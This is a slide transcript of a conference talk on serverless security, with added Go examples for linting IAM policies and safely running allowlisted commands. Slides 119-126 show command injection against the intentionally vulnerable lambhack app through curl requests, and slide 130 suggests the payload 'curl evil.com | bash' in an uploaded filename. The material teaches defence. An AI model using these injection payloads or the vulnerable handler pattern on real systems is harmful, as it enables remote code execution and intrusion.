Serverless Security at LASCON 2017

Upload: james-wickett

Post on 21-Jan-2018

TRANSCRIPT

  1. LASCON 2017 @WICKETT. SERVERLESS SECURITY: A PRAGMATIC PRIMER FOR BUILDERS AND DEFENDERS. JAMES WICKETT
  2. Don't worry, this is not a thinly veiled vendor pitch.
  3. WANT THE SLIDES RIGHT NOW? Send an email to [email protected]
  4. JAMES WICKETT: Head of Research at Signal Sciences; DevOps Days Austin organizer; author of DevOps Fundamentals at lynda.com; blogger at theagileadmin.com and labs.signalsciences.com
  5. CONCLUSION (1 OF 2)
     - Serverless encourages functions as deploy units, coupled with third-party services that allow running end-to-end applications without worrying about system operation.
     - New serverless patterns are just emerging.
     - Security with serverless is easier.
     - Security with serverless is harder.
  6. CONCLUSION (2 OF 2)
     - Four key areas apply to serverless security: software supply chain security, delivery pipeline security, data flow security, attack detection.
     - Lambhack! A very vulnerable Lambda stack, open source project: github.com/wickett/lambhack
  7. WHAT IS SERVERLESS?
  8. MISCONCEPTIONS
  9. IT'S MARKETING (CLOUD REBRANDED)
  10. SERVERLESS == NO SERVERS
  11. SERVERLESS == BACKEND AS A SERVICE
  12. SERVERLESS == PLATFORM AS A SERVICE
  13. TK: ADRIANCO QUOTE
  14. SO, WHAT IS SERVERLESS?
  15. http://martinfowler.com/articles/serverless.html (@mikebroberts)
  16. (image-only slide)
  17. HISTORY OF SERVERLESS
     - 2012: used to describe BaaS and continuous integration services run by third parties
     - Late 2014: AWS launched Lambda
     - July 2015: AWS launched API Gateway
     - October 2015: AWS re:Invent, "The Serverless Company Using AWS Lambda"
     - 2015 to present: frameworks forming
     - 2016: Google Cloud Functions, Azure Functions released
     - 2016: serverless conferences started
  18. Waste vs. value across hardware, VMs and serverless (inspiration from @adrianco)
  19. Decomposed microservice architecture
  20. WHAT CAN WE SAY IS SERVERLESS?
  21. SERVERLESS IS FUNCTIONS AS A SERVICE (FaaS)
  22. CONTAINERS ON DEMAND
  23. SERVERLESS IS (NO MANAGEMENT OF) SERVERS
  24. SERVERLESS IS SERVICEFULL
  25. SERVERLESS IS AN OPINIONATED FRAMEWORK FOR COMPUTE AND CONTAINERS
  26. "If you want to lead your company bravely into the new world, you would do well to focus a lot on how serverless will evolve." @cloud_opinion, https://medium.com/@cloud_opinion/the-pattern-may-repeat-26de1e8b489d
  27. THE CLOUD WAS TO VIRTUALIZATION AS SERVERLESS WILL BE TO CONTAINERS
  28. SERVERLESS WILL COMPLETELY DISRUPT THE CONTAINER MARKET IN ONE, MAYBE TWO YEARS.
  29. SERVERLESS DEFINITION: Serverless encourages functions as deploy units, coupled with third-party services that allow running end-to-end applications without worrying about system operation.
  30. SO, WHAT ARE THE UPSIDES?
  31. SCALING BUILT IN
  32. PAY FOR WHAT YOU USE IN 100 MS INCREMENTS
  33. WITH SERVERLESS, SYSTEM ADMINISTRATION IS (MOSTLY) LOWER
  34. SHORT-CIRCUITS OPS AND MOVES INFRASTRUCTURE RUNTIME CLOSER TO DEVS
  35. YOU CAN SKIP DOCKERING ALL THE THINGS!
  36. GREAT, WHAT'S THE CATCH?
  37. "Ops burden to rationalize serverless model" (@patrickdebois)
  38. (image-only slide)
  39. VENDOR LOCK-IN
  40. MONITORING
  41. https://speakerdeck.com/smithclay/faas-measurement-fundamentals
  42. https://speakerdeck.com/smithclay/faas-measurement-fundamentals
  43. LOGGING
  44. RELIABILITY
  45. SERVERLESS DEAL KILLERS (MAYBE?)
     - app needs large local disk space
     - long-running jobs
     - big I/O tasks
     - latency-sensitive requests that can't wait for the cold-startup time
  46. SERVERLESS USE CASES
  47. MESSAGE PROCESSING (http://martinfowler.com/articles/serverless.html)
  48. API GATEWAY (http://martinfowler.com/articles/serverless.html)
  49. WEB APPLICATIONS
  50. MORE SERVERLESS USE CASES: CI/CD, auth, WordPress, scraper, event ingestion, chatbots, load testing
  51. Security
  52. LET'S TRY A SAMPLE APPLICATION IN AWS
  53. STEP 1: PICK A FRAMEWORK. Serverless, Apex, Go Sparta, Kappa
  54. (image-only slide)
  55. GO SPARTA
     - Golang! AWS Lambda supports bring-your-own-binary.
     - Sparta wraps your compiled binary with a Node.js shim.
     - Go Sparta also handles all the other AWS services your app consumes.
  56. GO SPARTA INCLUDES: CloudWatch Events and Logs; DynamoDB, Kinesis, S3; SES, SNS; API Gateway creation
  57. STEP 2: IDEA! Build a word cloud generator, able to consume 3rd-party APIs for text sources, that returns JSON with counts of the words in the text. Keep it simple.
  58. STEP 3: DESIGN AND ARCHITECTURE (using Go Sparta for the framework): Lambda, S3, API Gateway
  59. (image-only slide)
  60. STEP 4: WRITE THE HANDLER
  61. STEP 5: SET UP API GATEWAY
  62. STEP 6: SET THE CONFIG DETAILS
  63. STEP 7: PROVISION YOUR APP!
  64. STEP 8: SET UP STRICT IAM POLICIES
  65. STEP 9: GIVE UP AND SET VERY BAD IAM POLICIES, PROMISE TO FIX LATER
  66. STEP 10: PROVISION YOUR APP!
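Steps 8 and 9 are the honest version of most first serverless deployments: the function role ends up with Action "*" on Resource "*" and a promise to tighten it later. A pipeline check can refuse that role before step 10 provisions it. The Go below is an added example, not code from the deck or from Go Sparta; the two policy documents and the bucket name are constructed, the second one being the scoped role the word cloud function (read and write one bucket) would need instead.

```go
package main
import (
	"encoding/json"
	"fmt"
	"strings"
)
// Two constructed IAM policy documents (the bucket name is a placeholder): the step 9
// "very bad, fix later" shortcut, and one scoped to what the word cloud function needs.
const badPolicy = `{"Version":"2012-10-17","Statement":[{"Effect":"Allow","Action":"*","Resource":"*"}]}`
const strictPolicy = `{"Version":"2012-10-17","Statement":[
 {"Effect":"Allow","Action":["s3:GetObject","s3:PutObject"],
  "Resource":"arn:aws:s3:::wordcloud-example-bucket/*"}]}`

// asList decodes an IAM field that may be either a single string or a list of strings.
func asList(raw json.RawMessage) []string {
	var one string
	if json.Unmarshal(raw, &one) == nil {
		return []string{one}
	}
	var many []string
	json.Unmarshal(raw, &many) // a malformed field simply yields no entries
	return many
}

// LintPolicy returns one finding per Allow statement that grants a bare "*" action, a
// service-wide "svc:*" action, or a "*" resource; a deploy step can refuse any finding.
func LintPolicy(doc string) ([]string, error) {
	var p struct{ Statement []struct{ Effect string; Action, Resource json.RawMessage } }
	if err := json.Unmarshal([]byte(doc), &p); err != nil {
		return nil, err
	}
	var findings []string
	for i, s := range p.Statement {
		if s.Effect != "Allow" {
			continue
		}
		for _, a := range asList(s.Action) {
			if a == "*" || strings.HasSuffix(a, ":*") {
				findings = append(findings, fmt.Sprintf("statement %d: wildcard action %q", i, a))
			}
		}
		for _, r := range asList(s.Resource) {
			if r == "*" {
				findings = append(findings, fmt.Sprintf("statement %d: wildcard resource", i))
			}
		}
	}
	return findings, nil
}
```

Deny statements are skipped on purpose: a Deny on "*" narrows a role rather than widening it.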
  67. APP IN AWS CONSOLE
  68. TEST LAMBDA EXEC IN CONSOLE: FIRST RUN OF 343 MS
  69. SECOND RUN ONLY TOOK 84 MS
  70. API GATEWAY IN CONSOLE
  71. API GATEWAY EXECUTION IN CONSOLE
  72. RETURNED JSON
  73. MONITORING LAMBDA IN CONSOLE
  74. OVERALL SERVERLESS EXPERIENCE
     - You need a framework or you die.
     - Why is IAM so haaarrdd?
     - Wow! I have a fully elastic, fast API running on the internet for basically no cost.
     - This is going to be huge!
  75. IS SECURITY READY FOR SERVERLESS?
  76. (image-only slide)
  77. SECURITY
  78. "many security teams work with a worldview where their goal is to inhibit change as much as possible"
  79. OLD PATH VS. NEW PATH
     - Embrace Secrecy -> Create Feedback Loops
     - Just Pass Audit! -> Compliance adds Value
     - Enforce Stability -> Create Chaos
     - Build a Wall -> Zero Trust Networks
     - Slow Validation -> Fast and Non-blocking
     - Certainty Testing -> Adversity Testing
     - Test when Done -> Shift Left
     - Process Driven -> The Paved Road
  80. (image-only slide)
  81. FOUR AREAS OF SERVERLESS SECURITY: secure software supply chain; delivery pipeline; data flow security; attack detection
  82. source: @devsecops
  83. SURFACE AREA REDUCTION: The code you write (and its libs) is your surface area now. This is a change from the past (e.g. Shellshock, Heartbleed) and the numerous fire drills our industry had to endure because of inherited components.
  84. SURFACE AREA EXPANSION: TLS control to the provider; routing control to the provider; consumption of third-party services; IAM roles and policy confusion
  85. SSL / TLS FROM THE PROVIDER
  86. OLD WAY vs. NEW WAY
  87. ROUTING FROM THE PROVIDER
  88. ROUTING THE OLD WAY
  89. ROUTING THE NEW WAY
  90. SERVICE AND 3RD PARTY EXPANSION: Lambda + S3 + Kinesis + DynamoDB + CloudFormation + API Gateway + Auth0
  91. IAM ROLES AND POLICIES: https://media.ccc.de/v/33c3-7865-gone_in_60_milliseconds
  92. Recommendation: use a third-party service to monitor for provider config changes
  93. USE GOOD HYGIENE WITH YOUR PROVIDER
     - disable root access keys
     - manage users with profiles
     - secure your keys in your deploy system
     - secure keys in the dev system
     - use provider MFA
  94. DELIVERY PIPELINE SECURITY
  95. (image-only slide)
  96. UNIT TESTING
  97. EASIER TO MOCK vs. HARDER TO MOCK
  98. UNIT TESTING IS EVEN MORE CRITICAL AS INTEGRATION TESTING IN DEV IS HARDER
  99. INTEGRATION TESTING: use of a staging or pre-prod env; end-to-end synthetic integration tests; all the usual suspects
  100. CONFIGURATION IS PART OF DELIVERY
  101. GOOD PIPELINE PRACTICES
     - only dev keys can push to dev
     - only the build/deploy system can push to pre-prod
     - integration tests must pass in this env
     - security validation must take place before promotion
     - allow push to prod only by the deploy system
  102. RECOMMENDED SECURITY TESTING TOOLS: BDD-Security (github.com/continuumsecurity/bdd-security); Gauntlt (gauntlt.org, github.com/gauntlt/gauntlt); Docker
  103. GAUNTLT WORKSHOP IN 9 EXAMPLES: http://www.slideshare.net/wickett/pragmatic-security-and-rugged-devops-sxsw-2015
  104. DATA FLOW. Development: data flow diagrams, threat modeling. Runtime: logging, custom monitors/metrics.
  105. "Your provider is responsible for the underlying infrastructure and services. You are responsible for ensuring you use the services in a secure manner." https://read.acloud.guru/adopting-serverless-architectures-and-security-254a0c12b54a
  106. DATA FLOW SECURITY: spoofing consumed resources; denial of service; timeouts; execution restrictions for resources; capacity issues
  107. ATTACK DETECTION
  108. DOES APPLICATION SECURITY STILL MATTER?
  109. https://medium.com/@PaulDJohnston/security-and-serverless-ec52817385c4
  110. (image-only slide)
  111. APPSEC GREATEST HITS (XSS, SQLI, CMDEXE) STILL RELEVANT 15 YEARS LATER!
  112. INSPIRED BY ALL THE GOATS
  113. (image-only slide)
  114. INTRODUCING LAMBHACK
     - Serverless has a false sense of security: "the API proxy layer thing protects me, right?" ;)
     - Wanted to make the point that appsec is relevant in serverless.
     - A vulnerable Lambda + API Gateway stack, born from the heritage of WebGoat, RailsGoat, Gruyere, and others.
  115. (image-only slide)
  116. github.com/wickett/lambhack
     - A vulnerable Lambda + API Gateway stack
     - Open source, MIT licensed
     - Includes arbitrary code execution in a query string
     - More work needed; pull requests accepted and looking for community help
  117. "lambhack is a vulnerable serverless lambda application. It would certainly be a bad idea to base any coding patterns off what you see here."
  118. (image-only slide)
  119. WHY IS THIS BAD?
       command := lambdaEvent.QueryParams["args"] // attacker-controlled query string value
       output := runner.Run(command)              // handed to a shell runner unchanged
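The two lines above take the raw "args" query string value and hand it to a shell runner, which is why anything after a ";" executes too. The following Go is an added example, not lambhack's code and not the Go Sparta API (the action names, the file rule and the helper names are hypothetical): the request may only pick a verb from a fixed allowlist, the one request-controlled argument is validated and passed as its own argv element, and exec.Command runs the result without a shell.

```go
package main

import (
	"fmt"
	"os/exec"
	"regexp"
	"strings"
)

// actions is the fixed allowlist of verbs the endpoint accepts, each mapped to an argv
// (hypothetical names for the word cloud function). The request never supplies the
// program or a raw command line, which is what lambhack's /c?args= lets it do.
var actions = map[string][]string{
	"tmp-listing": {"ls", "-la", "/tmp"},
	"wordcount":   {"wc", "-w"},
}

// safeFile constrains the one request-controlled argv element to a plain basename.
var safeFile = regexp.MustCompile(`^[A-Za-z0-9_-]{1,64}\.txt$`)

// ResolveCommand maps API Gateway query parameters to an argv. It never assembles a
// shell string: "action" selects a fixed argv and "file", if present, is validated and
// appended as its own argument, so ';', '|' and '$(' in either value are never interpreted.
func ResolveCommand(query map[string]string) ([]string, error) {
	base, ok := actions[query["action"]]
	if !ok {
		return nil, fmt.Errorf("unknown action %q", query["action"])
	}
	argv := append([]string(nil), base...) // copy so callers cannot mutate the table
	if f, present := query["file"]; present {
		if !safeFile.MatchString(f) {
			return nil, fmt.Errorf("file %q must be a simple name ending in .txt", f)
		}
		argv = append(argv, "/tmp/"+f)
	}
	return argv, nil
}

// RunArgv executes argv directly with exec.Command (no shell involved), so every
// element reaches the program as one literal argument.
func RunArgv(argv []string) (string, error) {
	out, err := exec.Command(argv[0], argv[1:]...).CombinedOutput()
	return strings.TrimSpace(string(out)), err
}

func main() {
	// Constructed request mirroring the lambhack demo: the injection is rejected outright.
	argv, err := ResolveCommand(map[string]string{"action": "wordcount", "file": "notes.txt; uname -a"})
	fmt.Println(argv, err)
}
```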
  120. With command execution available to us in lambhack, we can poke around the container a bit.
  121. UNAME -A
       $ curl "https://XXXX.execute-api.us-east-1.amazonaws.com/prod/lambhack/c?args=uname+-a;+sleep+1"
       > Linux ip-10-36-34-119 4.4.35-33.55.amzn1.x86_64 #1 SMP Tue Dec 6 20:30:04 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
  122. CAT /PROC/VERSION
       $ curl "https://XXXX.execute-api.us-east-1.amazonaws.com/prod/lambhack/c?args=cat+/proc/version;+sleep+1"
       > Linux version 4.4.35-33.55.amzn1.x86_64 (mockbuild@gobi-build-60006) (gcc version 4.8.3 20140911 (Red Hat 4.8.3-9) (GCC) ) #1 SMP Tue Dec 6 20:30:04 UTC 2016
  123. LET'S LOOK IN /TMP
       $ curl "https://XXXX.execute-api.us-east-1.amazonaws.com/prod/lambhack/c?args=ls+-la+/tmp;+sleep+1"
       total 17916
       drwx------  2 sbx_user1056 490      4096 Feb 8 22:02 .
       drwxr-xr-x 21 root         root     4096 Feb 8 21:47 ..
       -rwxrwxr-x  1 sbx_user1056 490  18334049 Feb 8 22:02 Sparta.lambda.amd64
  124. LAMBDA REUSE IN ACTION!
       $ curl "https://XXXX.execute-api.us-east-1.amazonaws.com/prod/lambhack/c?args=ls+/tmp;+sleep+1"
       $ curl "https://XXXX.execute-api.us-east-1.amazonaws.com/prod/lambhack/c?args=touch+/tmp/wickettfile;+sleep+1"
       $ curl "https://XXXX.execute-api.us-east-1.amazonaws.com/prod/lambhack/c?args=ls+/tmp;+sleep+1"
       > Sparta.lambda.amd64
       > wickettfile
  125. WHICH CURL
       $ curl "https://XXXX.execute-api.us-east-1.amazonaws.com/prod/lambhack/c?args=which+curl;+sleep+1"
       > /usr/bin/curl
  126. GOT PROXY?
       $ curl "https://XXXX.execute-api.us-east-1.amazonaws.com/prod/lambhack/c?args=curl+https://www.example.com;+sleep+1"
       > (the HTML of the www.example.com "Example Domain" landing page comes back: the function has outbound internet access)
  127. FUTURE OF LAMBHACK: help needed! Add XSS and other attacks; add auth vectors and examples; it needs a UI, please! Pull requests accepted :)
  128. APPSEC THOUGHTS
     - Lambda has a limited blast radius, but not zero.
     - Monitoring/logging plays a key role here: detect longer run times, higher error-rate occurrences, data ingestion.
     - Log the actions of Lambdas.
  129. APPLICATION SECURITY IS STILL RELEVANT
  130. TYPES OF ATTACKS: new surface area, similar appsec problems: command exec, XSS, injection attacks. Try new things, e.g. appending "curl evil.com | bash" or "alert(1)" to a filename you upload on S3.
  131. DEFENSE: logging, emitting events; usage metrics; Vandium (SQLi) wrapper; Content Security Policy (CSP); API gateways are a good place to add defense; more things need to be done here
  132. FINAL THOUGHT: Development in serverless is easier than ever, attracting new developers to web development; as a result, application security will see a rise.
  133. (image-only slide)
  134. CONCLUSION (1 OF 2)
     - Serverless encourages functions as deploy units, coupled with third-party services that allow running end-to-end applications without worrying about system operation.
     - New serverless patterns are just emerging.
     - Security with serverless is easier.
     - Security with serverless is harder.
  135. CONCLUSION (2 OF 2)
     - Four key areas apply to serverless security: software supply chain security, delivery pipeline security, data flow security, attack detection.
     - Lambhack! A very vulnerable Lambda stack, open source project: github.com/wickett/lambhack
  136. WANT THE SLIDES RIGHT NOW OR HAVE QUESTIONS? Send an email to [email protected]